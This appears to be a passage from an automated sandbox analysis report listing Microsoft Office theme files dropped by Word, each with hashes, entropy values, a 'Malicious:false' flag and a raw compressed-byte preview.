                                                                                                                                                        Size (bytes):777647
                                                                                                                                                        Entropy (8bit):7.689662652914981
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                                        MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                                        SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                                        SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                                        SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):924687
                                                                                                                                                        Entropy (8bit):7.824849396154325
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                                        MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                                        SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                                        SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                                        SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):966946
                                                                                                                                                        Entropy (8bit):7.8785200658952
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                                        MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                                        SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                                        SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                                        SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1204049
                                                                                                                                                        Entropy (8bit):7.92476783994848
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                                        MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                                        SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                                        SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                                        SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):486596
                                                                                                                                                        Entropy (8bit):7.668294441507828
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                                        MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                                        SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                                        SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                                        SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):976001
                                                                                                                                                        Entropy (8bit):7.791956689344336
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                                        MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                                        SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                                        SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                                                        SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1463634
                                                                                                                                                        Entropy (8bit):7.898382456989258
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                                                        MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                                        SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                                        SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                                        SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2218943
                                                                                                                                                        Entropy (8bit):7.942378408801199
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                                        MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                                        SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                                        SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                                        SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1750795
                                                                                                                                                        Entropy (8bit):7.892395931401988
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                                        MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                                        SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                                        SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                                        SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2924237
                                                                                                                                                        Entropy (8bit):7.970803022812704
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                                        MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                                        SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                                        SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                                        SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2357051
                                                                                                                                                        Entropy (8bit):7.929430745829162
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                                        MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                                        SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                                        SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                                        SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3611324
                                                                                                                                                        Entropy (8bit):7.965784120725206
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                                        MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                                                        SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                                        SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                                                        SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1091485
                                                                                                                                                        Entropy (8bit):7.906659368807194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                                        MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                                        SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                                        SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                                        SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                                        Malicious:false
